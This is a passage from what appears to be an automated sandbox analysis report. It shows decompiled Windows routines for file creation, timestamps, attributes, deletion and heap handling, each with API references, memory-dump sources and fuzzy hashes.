                                                                            						 *(_v8 + 0x48) = _t64;
                                                                            						_t40 = _v8;
                                                                            						__eflags =  *(_t40 + 0x350) & 0x00000002;
                                                                            						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
                                                                            							__eflags =  *0x1cdda0 & 0x00000001;
                                                                            							if(( *0x1cdda0 & 0x00000001) == 0) {
                                                                            								_v16 =  &_v8;
                                                                            								E001BA31C(5,  &_v16);
                                                                            								__eflags = _a8;
                                                                            								if(_a8 != 0) {
                                                                            									_t44 =  *0x1cdd40; // 0xf32588
                                                                            									 *0x1cd814 = _t44;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						L6:
                                                                            						E001B7A50(_t70);
                                                                            						return _t75;
                                                                            					} else {
                                                                            						 *((intOrPtr*)(E001B7ECC())) = 0x16;
                                                                            						goto L5;
                                                                            					}
                                                                            				}
                                                                            			}



















                                                                            APIs
                                                                              • Part of subcall function 001B8516: GetLastError.KERNEL32(?,001D00E0,001B3394,001D00E0,?,?,001B2E0F,?,?,001D00E0), ref: 001B851A
                                                                              • Part of subcall function 001B8516: _free.LIBCMT ref: 001B854D
                                                                              • Part of subcall function 001B8516: SetLastError.KERNEL32(00000000,?,001D00E0), ref: 001B858E
                                                                              • Part of subcall function 001B8516: _abort.LIBCMT ref: 001B8594
                                                                              • Part of subcall function 001BA7D1: _abort.LIBCMT ref: 001BA803
                                                                              • Part of subcall function 001BA7D1: _free.LIBCMT ref: 001BA837
                                                                              • Part of subcall function 001BA446: GetOEMCP.KERNEL32(00000000,?,?,001BA6CF,?), ref: 001BA471
                                                                            • _free.LIBCMT ref: 001BA72A
                                                                            • _free.LIBCMT ref: 001BA760
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _free$ErrorLast_abort
                                                                            • String ID:
                                                                            • API String ID: 2991157371-0
                                                                            • Opcode ID: b01f57dc49c910ce2868ef7dd99d5f3492a148eb18bc98c24a6a664472cdcacb
                                                                            • Instruction ID: f6de15c0362724cba3063b8e1cfbe923a5252b1b806fb924c9eb40bc5051beb6
                                                                            • Opcode Fuzzy Hash: b01f57dc49c910ce2868ef7dd99d5f3492a148eb18bc98c24a6a664472cdcacb
                                                                            • Instruction Fuzzy Hash: C931D931908208AFDB10EFA9D541BEDBBF4EF51360F654099E4049B2A1EF729E41CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00199528(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
                                                                            				long _v0;
                                                                            				signed char _t34;
                                                                            				signed int _t36;
                                                                            				void* _t37;
                                                                            				signed char _t46;
                                                                            				struct _SECURITY_ATTRIBUTES* _t47;
                                                                            				long _t56;
                                                                            				void* _t59;
                                                                            				long _t63;
                                                                            
                                                                            				E001AD940();
                                                                            				_t46 = _a4108;
                                                                            				_t34 = _t46 >> 0x00000001 & 0x00000001;
                                                                            				_t59 = __ecx;
                                                                            				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
                                                                            					_t63 = 1;
                                                                            					__eflags = 1;
                                                                            				} else {
                                                                            					_t63 = 0;
                                                                            				}
                                                                            				 *(_t59 + 0x18) = _t46;
                                                                            				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
                                                                            				_t36 =  *(E0019B927(_t34, _a4104)) & 0x0000ffff;
                                                                            				if(_t36 == 0x2e || _t36 == 0x20) {
                                                                            					if((_t46 & 0x00000020) != 0) {
                                                                            						goto L8;
                                                                            					} else {
                                                                            						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
                                                                            						_t47 = 0;
                                                                            						_t56 = _v0;
                                                                            					}
                                                                            				} else {
                                                                            					L8:
                                                                            					_t56 = _v0;
                                                                            					_t47 = 0;
                                                                            					__eflags = 0;
                                                                            					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
                                                                            					 *(_t59 + 4) = _t37;
                                                                            				}
                                                                            				if( *(_t59 + 4) == 0xffffffff && E0019B32C(_a4104,  &_a4, 0x800) != 0) {
                                                                            					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
                                                                            				}
                                                                            				 *((char*)(_t59 + 0x12)) = 1;
                                                                            				 *(_t59 + 0xc) = _t47;
                                                                            				 *(_t59 + 0x10) = _t47;
                                                                            				return E0019FAB1(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
                                                                            			}













                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00199BF3,?,?,001976AC), ref: 001995B0
                                                                            • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00199BF3,?,?,001976AC), ref: 001995E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: e4be073c92dbe0f051661feb4aad2ce1fde4de9abf602fe2c7a2f12204245b61
                                                                            • Instruction ID: 86a2fe7ebd26642bb7c8d0a5954ff53bf7625e864f4502da2716befebdb88e69
                                                                            • Opcode Fuzzy Hash: e4be073c92dbe0f051661feb4aad2ce1fde4de9abf602fe2c7a2f12204245b61
                                                                            • Instruction Fuzzy Hash: 5721F3B1004748AFEB318F68C885BA77BE8EB59364F01492EF5D5C21D2C375AD89CA61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                            			E00199A7E(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
                                                                            				void* _v8;
                                                                            				void* _v16;
                                                                            				void* _v24;
                                                                            				signed char _v25;
                                                                            				int _t34;
                                                                            				signed char _t49;
                                                                            				signed int* _t51;
                                                                            				signed char _t57;
                                                                            				void* _t58;
                                                                            				void* _t59;
                                                                            				signed int* _t60;
                                                                            				signed int* _t62;
                                                                            
                                                                            				_t59 = __esi;
                                                                            				_t58 = __ecx;
                                                                            				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
                                                                            					FlushFileBuffers( *(__ecx + 4));
                                                                            				}
                                                                            				_t51 = _a4;
                                                                            				_t49 = 1;
                                                                            				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
                                                                            					_t57 = 0;
                                                                            				} else {
                                                                            					_t57 = 1;
                                                                            				}
                                                                            				_push(_t59);
                                                                            				_t60 = _a8;
                                                                            				_v25 = _t57;
                                                                            				if(_t60 == 0) {
                                                                            					L9:
                                                                            					_a4 = 0;
                                                                            				} else {
                                                                            					_a4 = _t49;
                                                                            					if(( *_t60 | _t60[1]) == 0) {
                                                                            						goto L9;
                                                                            					}
                                                                            				}
                                                                            				_t62 = _a12;
                                                                            				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
                                                                            					_t49 = 0;
                                                                            				}
                                                                            				if(_t57 != 0) {
                                                                            					E001A082F(_t51, _t57,  &_v24);
                                                                            				}
                                                                            				if(_a4 != 0) {
                                                                            					E001A082F(_t60, _t57,  &_v8);
                                                                            				}
                                                                            				if(_t49 != 0) {
                                                                            					E001A082F(_t62, _t57,  &_v16);
                                                                            				}
                                                                            				asm("sbb eax, eax");
                                                                            				asm("sbb eax, eax");
                                                                            				asm("sbb eax, eax");
                                                                            				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
                                                                            				return _t34;
                                                                            			}
















                                                                            APIs
                                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,0019738C,?,?,?), ref: 00199A98
                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00199B48
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: File$BuffersFlushTime
                                                                            • String ID:
                                                                            • API String ID: 1392018926-0
                                                                            • Opcode ID: c87925961a578212146ee4430ecc89448ecec62d269fcdb5d40258bcdd107c19
                                                                            • Instruction ID: 41eeeefbee3c894b7bde99700138f839a58f134d3c1265166d3b020392ac2982
                                                                            • Opcode Fuzzy Hash: c87925961a578212146ee4430ecc89448ecec62d269fcdb5d40258bcdd107c19
                                                                            • Instruction Fuzzy Hash: 6721D131648386AFCB11DE28C891AABBBE8EF65304F08091DB881C7151D739ED08CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
                                                                            			E001B9990(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                            				struct HINSTANCE__* _t13;
                                                                            				signed int* _t20;
                                                                            				signed int _t27;
                                                                            				signed int _t28;
                                                                            				signed int _t29;
                                                                            				signed int _t33;
                                                                            				intOrPtr* _t34;
                                                                            
                                                                            				_t20 = 0x1f07b8 + _a4 * 4;
                                                                            				_t27 =  *0x1cd668; // 0x44aa1787
                                                                            				_t29 = _t28 | 0xffffffff;
                                                                            				_t33 = _t27 ^  *_t20;
                                                                            				asm("ror esi, cl");
                                                                            				if(_t33 == _t29) {
                                                                            					L14:
                                                                            					return 0;
                                                                            				}
                                                                            				if(_t33 == 0) {
                                                                            					_t34 = _a12;
                                                                            					if(_t34 == _a16) {
                                                                            						L7:
                                                                            						_t13 = 0;
                                                                            						L8:
                                                                            						if(_t13 == 0) {
                                                                            							L13:
                                                                            							_push(0x20);
                                                                            							asm("ror edi, cl");
                                                                            							 *_t20 = _t29 ^ _t27;
                                                                            							goto L14;
                                                                            						}
                                                                            						_t33 = GetProcAddress(_t13, _a8);
                                                                            						if(_t33 == 0) {
                                                                            							_t27 =  *0x1cd668; // 0x44aa1787
                                                                            							goto L13;
                                                                            						}
                                                                            						 *_t20 = E001ADB10(_t33);
                                                                            						goto L2;
                                                                            					} else {
                                                                            						goto L4;
                                                                            					}
                                                                            					while(1) {
                                                                            						L4:
                                                                            						_t13 = E001B9A2C( *_t34); // executed
                                                                            						if(_t13 != 0) {
                                                                            							break;
                                                                            						}
                                                                            						_t34 = _t34 + 4;
                                                                            						if(_t34 != _a16) {
                                                                            							continue;
                                                                            						}
                                                                            						_t27 =  *0x1cd668; // 0x44aa1787
                                                                            						goto L7;
                                                                            					}
                                                                            					_t27 =  *0x1cd668; // 0x44aa1787
                                                                            					goto L8;
                                                                            				}
                                                                            				L2:
                                                                            				return _t33;
                                                                            			}











                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 001B99F0
                                                                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001B99FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc__crt_fast_encode_pointer
                                                                            • String ID:
                                                                            • API String ID: 2279764990-0
                                                                            • Opcode ID: 49fe923d559061ede9924c722f74916c182a9d7567277d98bcaa17cd393cc2b2
                                                                            • Instruction ID: 64af38e3ec1a4905c23d8a519206e112400e6c3ee277f42cf9acef2e7fb4101e
                                                                            • Opcode Fuzzy Hash: 49fe923d559061ede9924c722f74916c182a9d7567277d98bcaa17cd393cc2b2
                                                                            • Instruction Fuzzy Hash: 0F110633A006319B9F25DE39EC40DEAB7A5AB853647164260FE18AB694D730EC43C6D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                            			E00199B57() {
                                                                            				long _v4;
                                                                            				void* __ecx;
                                                                            				void* __ebp;
                                                                            				long _t12;
                                                                            				signed int _t14;
                                                                            				signed int _t21;
                                                                            				signed int _t22;
                                                                            				void* _t23;
                                                                            				long _t32;
                                                                            				void* _t34;
                                                                            
                                                                            				_t34 = _t23;
                                                                            				_t22 = _t21 | 0xffffffff;
                                                                            				if( *(_t34 + 4) != _t22) {
                                                                            					L3:
                                                                            					_v4 = _v4 & 0x00000000;
                                                                            					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
                                                                            					_t32 = _t12;
                                                                            					if(_t32 != _t22 || GetLastError() == 0) {
                                                                            						L7:
                                                                            						asm("cdq");
                                                                            						_t14 = 0 + _t32;
                                                                            						asm("adc edx, 0x0");
                                                                            						goto L8;
                                                                            					} else {
                                                                            						if( *((char*)(_t34 + 0x14)) == 0) {
                                                                            							_t14 = _t22;
                                                                            							L8:
                                                                            							return _t14;
                                                                            						}
                                                                            						E00196DE2(0x1d00e0, 0x1d00e0, _t34 + 0x1e);
                                                                            						goto L7;
                                                                            					}
                                                                            				}
                                                                            				if( *((char*)(_t34 + 0x14)) == 0) {
                                                                            					return _t22;
                                                                            				}
                                                                            				E00196DE2(0x1d00e0, 0x1d00e0, _t34 + 0x1e);
                                                                            				goto L3;
                                                                            			}














                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00199B8D
                                                                            • GetLastError.KERNEL32 ref: 00199B99
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: c75961b3f45a76b50028e8244023b15d9beaff860a80a8935b7323bdbc2d3a4b
                                                                            • Instruction ID: 6563b1c6ea3cdfd54fc4b2c298bd1b6297d231bc5951c33f40c80afe4cfe4ed3
                                                                            • Opcode Fuzzy Hash: c75961b3f45a76b50028e8244023b15d9beaff860a80a8935b7323bdbc2d3a4b
                                                                            • Instruction Fuzzy Hash: 9B0152717012406BDB349E2DEC84F6AB6DAAB85315F14453EF193C26C0DB79DC48C621
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                            			E00199903(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
                                                                            				long _t14;
                                                                            				void* _t17;
                                                                            				intOrPtr* _t19;
                                                                            				long _t21;
                                                                            				void* _t23;
                                                                            				long _t25;
                                                                            				long _t28;
                                                                            				long _t31;
                                                                            
                                                                            				_t19 = __ecx;
                                                                            				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
                                                                            					L13:
                                                                            					return 1;
                                                                            				}
                                                                            				_t28 = _a4;
                                                                            				_t25 = _a8;
                                                                            				_t31 = _t25;
                                                                            				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
                                                                            					_t21 = _a12;
                                                                            				} else {
                                                                            					_t21 = _a12;
                                                                            					if(_t21 != 0) {
                                                                            						if(_t21 != 1) {
                                                                            							_t17 = E001996E1(_t23);
                                                                            						} else {
                                                                            							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
                                                                            						}
                                                                            						_t28 = _t28 + _t17;
                                                                            						asm("adc edi, edx");
                                                                            						_t21 = 0;
                                                                            					}
                                                                            				}
                                                                            				_a12 = _t25;
                                                                            				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
                                                                            				if(_t14 != 0xffffffff || GetLastError() == 0) {
                                                                            					goto L13;
                                                                            				} else {
                                                                            					return 0;
                                                                            				}
                                                                            			}












                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00199957
                                                                            • GetLastError.KERNEL32 ref: 00199964
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: 1114255e593d02e8e9f7f51a1411db087ac5815918ada887e1b157595bbf9c59
                                                                            • Instruction ID: 44eee8d2146edbc136cd9eaff485026ec8a4c9dd6d337b8d2a2fb73715a56421
                                                                            • Opcode Fuzzy Hash: 1114255e593d02e8e9f7f51a1411db087ac5815918ada887e1b157595bbf9c59
                                                                            • Instruction Fuzzy Hash: 9C01F2322012119B8F1C8E6E8C85ABF7769BF51738709422EFD27CB291DB30EC51D6A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                            			E001B7B78(void* __ecx, void* __edx, void* _a4, long _a8) {
                                                                            				void* __esi;
                                                                            				void* _t4;
                                                                            				long _t7;
                                                                            				void* _t9;
                                                                            				void* _t13;
                                                                            				void* _t14;
                                                                            				long _t16;
                                                                            
                                                                            				_t13 = __edx;
                                                                            				_t10 = __ecx;
                                                                            				_t14 = _a4;
                                                                            				if(_t14 != 0) {
                                                                            					_t16 = _a8;
                                                                            					__eflags = _t16;
                                                                            					if(_t16 != 0) {
                                                                            						__eflags = _t16 - 0xffffffe0;
                                                                            						if(_t16 <= 0xffffffe0) {
                                                                            							while(1) {
                                                                            								_t4 = RtlReAllocateHeap( *0x1f0874, 0, _t14, _t16); // executed
                                                                            								__eflags = _t4;
                                                                            								if(_t4 != 0) {
                                                                            									break;
                                                                            								}
                                                                            								__eflags = E001B7906();
                                                                            								if(__eflags == 0) {
                                                                            									goto L5;
                                                                            								}
                                                                            								_t7 = E001B6763(_t10, _t13, _t16, __eflags, _t16);
                                                                            								_pop(_t10);
                                                                            								__eflags = _t7;
                                                                            								if(_t7 == 0) {
                                                                            									goto L5;
                                                                            								}
                                                                            							}
                                                                            							L7:
                                                                            							return _t4;
                                                                            						}
                                                                            						L5:
                                                                            						 *((intOrPtr*)(E001B7ECC())) = 0xc;
                                                                            						L6:
                                                                            						_t4 = 0;
                                                                            						__eflags = 0;
                                                                            						goto L7;
                                                                            					}
                                                                            					E001B7A50(_t14);
                                                                            					goto L6;
                                                                            				}
                                                                            				_t9 = E001B7A8A(__ecx, _a8); // executed
                                                                            				return _t9;
                                                                            			}











                                                                            APIs
                                                                            • _free.LIBCMT ref: 001B7B99
                                                                              • Part of subcall function 001B7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B2FA6,?,0000015D,?,?,?,?,001B4482,000000FF,00000000,?,?), ref: 001B7ABC
                                                                            • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,001D00E0,0019CB18,?,?,?,?,?,?), ref: 001B7BD5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AllocateHeap$_free
                                                                            • String ID:
                                                                            • API String ID: 1482568997-0
                                                                            • Opcode ID: 4493d65efd2a9d07758bb9e90415c2b54d91430daa016b9f9c87062229163614
                                                                            • Instruction ID: f3bc3b1ab2b75cfd0f4beaaef4a2586f7d95ff6151c301aab0e5890c6dd54838
                                                                            • Opcode Fuzzy Hash: 4493d65efd2a9d07758bb9e90415c2b54d91430daa016b9f9c87062229163614
                                                                            • Instruction Fuzzy Hash: FDF06D3260C1156ADB363A369E41FEF3769DFE1BB1B15015AFC19AA2D0DF30DC4099A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001A0574(void* __ecx) {
                                                                            				long _v8;
                                                                            				long _v12;
                                                                            				int _t8;
                                                                            				void* _t14;
                                                                            				signed int _t15;
                                                                            				signed int _t17;
                                                                            
                                                                            				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
                                                                            				if(_t8 == 0) {
                                                                            					return _t8 + 1;
                                                                            				}
                                                                            				_t14 = 0;
                                                                            				_t17 = _v8;
                                                                            				_t15 = 1;
                                                                            				do {
                                                                            					if((_t17 & _t15) != 0) {
                                                                            						_t14 = _t14 + 1;
                                                                            					}
                                                                            					_t15 = _t15 + _t15;
                                                                            				} while (_t15 != 0);
                                                                            				if(_t14 >= 1) {
                                                                            					return _t14;
                                                                            				}
                                                                            				return 1;
                                                                            			}










                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 001A0581
                                                                            • GetProcessAffinityMask.KERNEL32 ref: 001A0588
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Process$AffinityCurrentMask
                                                                            • String ID:
                                                                            • API String ID: 1231390398-0
                                                                            • Opcode ID: 0f6e359559215ef0f2428ef856f970c1420b0dd0e2795e221078760ad3a4d7af
                                                                            • Instruction ID: feb3b7e89766ea0a9a5ee4fd834eedeb80612f09cc1319004ee92ef99f12cc24
                                                                            • Opcode Fuzzy Hash: 0f6e359559215ef0f2428ef856f970c1420b0dd0e2795e221078760ad3a4d7af
                                                                            • Instruction Fuzzy Hash: 40E09B76E10305AB5F1A86A49C058BB77DDD74E301B10517AF902D3700FB34DD414FA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            			E0019A12F(WCHAR* _a4, long _a8) {
                                                                            				short _v4100;
                                                                            				int _t12;
                                                                            				signed int _t18;
                                                                            				signed int _t19;
                                                                            
                                                                            				E001AD940();
                                                                            				_push(_t18);
                                                                            				_t12 = SetFileAttributesW(_a4, _a8); // executed
                                                                            				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
                                                                            				if(_t19 == 0 && E0019B32C(_a4,  &_v4100, 0x800) != 0) {
                                                                            					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
                                                                            				}
                                                                            				return _t19;
                                                                            			}








                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00199F65,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 0019A143
                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00199F65,?,?,?,00199DFE,?,00000001,00000000,?,?), ref: 0019A174
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 332ae7ab56d7b9467b3b81e252e1e37ee1bc89cb72d6e24acc0513d13e52849c
                                                                            • Instruction ID: 5c65d3ba907d3dca08a0e0ba18588549917d946f437c8faf7df6ca8841305679
                                                                            • Opcode Fuzzy Hash: 332ae7ab56d7b9467b3b81e252e1e37ee1bc89cb72d6e24acc0513d13e52849c
                                                                            • Instruction Fuzzy Hash: 2FF03031140109ABDF015F60DC41FEA7B6CBF14381F848061BC8C96165DB72D9E9EA90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ItemText_swprintf
                                                                            • String ID:
                                                                            • API String ID: 3011073432-0
                                                                            • Opcode ID: e9ac78d6c3c3a7c66fa54cb7af0a61b2e7a77494f1cedfcc018e9e1cd1c10963
                                                                            • Instruction ID: 9a31775ebad9844d301ce1169bea9190b3b0a6fe98e91c66fb7bc6cc3e7d23f2
                                                                            • Opcode Fuzzy Hash: e9ac78d6c3c3a7c66fa54cb7af0a61b2e7a77494f1cedfcc018e9e1cd1c10963
                                                                            • Instruction Fuzzy Hash: 97F0237550934836DF11EB74FC07F993B1C9B05781F440496BA05530E2F7725A614772
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                            			E00199E18(WCHAR* _a4) {
                                                                            				short _v4100;
                                                                            				int _t10;
                                                                            				signed int _t16;
                                                                            				signed int _t17;
                                                                            
                                                                            				E001AD940();
                                                                            				_push(_t16);
                                                                            				_t10 = DeleteFileW(_a4); // executed
                                                                            				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
                                                                            				if(_t17 == 0 && E0019B32C(_a4,  &_v4100, 0x800) != 0) {
